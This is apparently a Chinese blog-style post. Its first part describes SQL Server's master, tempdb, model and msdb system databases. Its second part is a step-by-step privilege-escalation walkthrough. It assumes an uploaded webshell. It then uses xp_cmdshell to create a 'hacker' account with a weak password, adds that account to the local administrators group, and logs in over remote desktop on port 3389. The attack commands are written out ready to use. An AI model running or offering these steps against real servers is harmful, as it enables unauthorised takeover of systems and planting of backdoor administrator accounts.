1、Master数据库
Master数据库记录了Sqlserver所有的服务器级系统信息,所有的注册帐户和密码,以及所有的系统设置信息,还记录了所有用户定义数据库的存储位置和初始化信息。
2、Tempdb数据库
Tempdb记录了所有的临时表、临时数据和临时创建的存储过程。Tempdb数据库是一个全局资源,没有专门的权限限制,允许所有可以连上Sqlserver服务器的用户使用。
在Tempdb数据库存放的所有数据信息都是临时的。每当连接断开时,所有的临时表和临时存储过程都将自动丢弃。每次系统启动时Sqlserver都会根据Model数据库重新创建Tempdb数据库。
3、Model数据库
Model数据库是用户建立新数据库的模板,它包含了将复制到每个用户数据库中去的系统表。每当创建数据库的语句create database执行时,服务器总是通过复制model数据库来建立新数据库的前面部分,新数据库的后面部分被初始化成空白的数据页,以供用户存放数据。
4、Msdb数据库
Msdb数据库主要被sqlserver agent用来进行复制、作业调度以及管理报警等活动。该数据库常被用来通过调度任务排除故障。
MSSqlservwer xp_cmdshell提权
一、前提上传大马成功后
二、端口扫描,发现有1433端口开放,是mssql数据库
三、连接mssql数据库输入数据库名master以及密码,在sql操作命令行输入“ select count(*)from master.dbo.sysobjects where xtype = ‘x‘ and name = ‘xp_cmdshell‘ ”,查看cmd_shell是否开启,存在则返回1;
四、添加系统账号,在sql操作命令中输入Exec master.dbo.xp_cmdshell ‘net user hacker 123456/add‘,没有回显列表表示成功;
继续输入 Exec master.dbo.xp_cmdshell ‘net localgroup administrators hacker /add‘ ,将hacker加入管理组;
五、淡季用户账户查看添加的账户;’
六、scan查看端口号,是否开启3389端口;
七、远程目标主机桌面即可成功;